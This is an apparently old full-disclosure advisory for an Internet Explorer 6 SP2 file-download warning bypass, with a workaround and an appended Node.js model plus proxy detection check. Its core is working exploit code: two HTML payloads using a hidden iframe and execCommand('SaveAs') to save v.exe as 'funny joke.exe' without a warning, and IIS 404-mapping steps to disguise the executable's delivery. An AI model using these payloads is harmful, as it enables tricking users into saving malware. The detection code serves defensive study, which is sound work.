Internet Explorer 6.0 SP2 File Download Security Warning Bypass Exploit

Source: 0day

Microsoft Internet Explorer (including IE 6.0 on Windows XP SP2) is reported vulnerable to a file download security warning
bypass. SP2 normally interposes a security warning before an executable fetched from a web page is saved; this unpatched flaw
may be exploited to download a malicious executable file masqueraded as an HTML file without that warning ever appearing.

Secunia did not release the technical details (security by obscurity), so we publish them on this page (full disclosure).

Solution

[EN] Disable Active Scripting, and turn off the "Hide file extensions for known file types" option [Tools -> Folder Options -> View].
Disabling Active Scripting stops the execCommand('SaveAs') call that actually writes the file; showing extensions only makes the
".exe" in the suggested file name visible in the Save dialog, it does not block the download by itself.
[FR] (the French wording of the same workaround, translated) Disable Active Scripting and the "Hide extensions for known file types"
option [Control Panel -> Folder Options -> View].


Credits go to cyber flash.


How does it work? (a.k.a. the exploit)

The following code requires no special server setup and should work from any web page that IE 6.0 fetches. The hidden frame
fetches v.exe, but the URL ends in "?.htm", so IE treats the response as an HTML page and renders the executable's bytes into the
frame instead of showing the download prompt; the SaveAs command then writes the frame's content to disk under the name supplied:
<html>
<body>
<!-- hidden frame: the ".htm" tail of the URL makes IE render v.exe as a page -->
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
<!-- SaveAs (showUI=1) saves the frame's content under the suggested name, with no download warning -->
<a href="#" onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>

Also, here's an example that requires modifying the IIS Error Mapping Properties (see below), so that the frame's URL carries a
plain ".htm" name and no query string at all:

<html>
<body>
<!-- vengy404.htm does not exist: the server's custom 404 handler returns v.exe instead -->
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click
<!-- SaveAs (showUI=1) saves the frame's content under the suggested name, with no download warning -->
<a href="#" onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>

Steps to configure IIS:

Launch the Internet Information Services manager.
Under the 'Custom Errors' tab, modify the Error Mapping Properties as follows:

Error Code: 404
Default Text: Not Found
Message Type: URL
URL: /v.exe (the name of the executable)

Within the HTML page, insert an IFRAME as follows:

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The file 'vengy404.htm' intentionally does not exist on the server, so requesting it triggers the 404 error mapping defined
above and the server answers with the contents of v.exe. The JavaScript below then references that stealthy v.exe data inside
the frame 'NotFound' and suggests the name 'funny joke.exe' when the user is prompted to save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');
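As an added example that is not part of the original advisory: a small Node.js model of the server side of both variants above (the "?.htm" query-string suffix on /v.exe, and the 404 custom-error mapping that returns /v.exe for the missing vengy404.htm), together with the check a filtering proxy or a reviewer could apply to such traffic. Only the URLs and file names come from the advisory; the site map, the "MZ placeholder" bytes standing in for the executable, and every function name are constructed for this demo. The point it makes is that the first variant can be spotted from the URL shape alone, while the 404 variant can only be caught by looking at the bytes the server actually returns.

```javascript
// Added example, not code from the original advisory. Models the server side of
// both delivery variants and the check a proxy could apply. The site map, the
// "MZ placeholder" bytes and all function names are constructed for the demo;
// only the URLs and file names are the advisory's.

// Constructed stand-in for the web root. "MZ placeholder" is not an executable,
// it merely starts with the PE magic bytes so the content check has something to match.
const SITE = {
  "/index.htm": { type: "text/html", body: Buffer.from("<html>hi</html>") },
  "/v.exe":     { type: "application/octet-stream", body: Buffer.from("MZ placeholder") },
};

// The advisory's IIS custom error mapping: Error Code 404, Message Type URL, URL /v.exe
const ERROR_MAP = { 404: "/v.exe" };

// What the server returns for a request, following the advisory's setup: the query
// string plays no part in locating the file, so "/v.exe?.htm" is simply "/v.exe";
// a missing file is answered with the body of the 404-mapped URL.
// (The HTTP status code IIS attaches to the mapped response is not modelled.)
function serve(rawUrl) {
  const u = new URL(rawUrl);
  const hit = SITE[u.pathname];
  if (hit) return { type: hit.type, body: hit.body, via: "direct" };
  const mapped = SITE[ERROR_MAP[404]];
  return { type: mapped.type, body: mapped.body, via: "error-map" };
}

// Extension at the very end of the URL string (what the URL appears to be) versus
// the extension of the path component (what is actually requested).
function extensionMismatch(rawUrl) {
  const u = new URL(rawUrl);
  const ext = (s) => (s.match(/\.[A-Za-z0-9]+$/) || [""])[0].toLowerCase();
  const pathExt = ext(u.pathname);
  const tailExt = ext(rawUrl);
  return { pathExt, tailExt, suspicious: pathExt !== "" && pathExt !== tailExt };
}

// PE/MZ magic: the two bytes every Windows executable starts with.
function looksLikePE(body) {
  return body.length >= 2 && body[0] === 0x4d && body[1] === 0x5a;
}

// Proxy-side check: does a URL that looks like an HTML document deliver executable
// bytes? Catches both variants, including the 404 one that the URL-shape check misses.
function inspect(rawUrl) {
  const resp = serve(rawUrl);
  const { tailExt, suspicious } = extensionMismatch(rawUrl);
  const claimsDocument = tailExt === ".htm" || tailExt === ".html";
  const executable = looksLikePE(resp.body);
  return {
    via: resp.via,
    urlShapeSuspicious: suspicious,
    executable,
    flagged: claimsDocument && executable,
  };
}

// Stand-alone demo over the advisory's two URLs plus a benign page.
for (const u of ["http://domain.com/v.exe?.htm",
                 "http://domain.com/vengy404.htm",
                 "http://domain.com/index.htm"]) {
  console.log(u, inspect(u));
}
```

Run it with node; for the two exploit URLs `flagged` is true, for index.htm it is false, and only the "?.htm" URL has `urlShapeSuspicious` set, which is why a filter keyed on URL shape alone would pass the 404 variant.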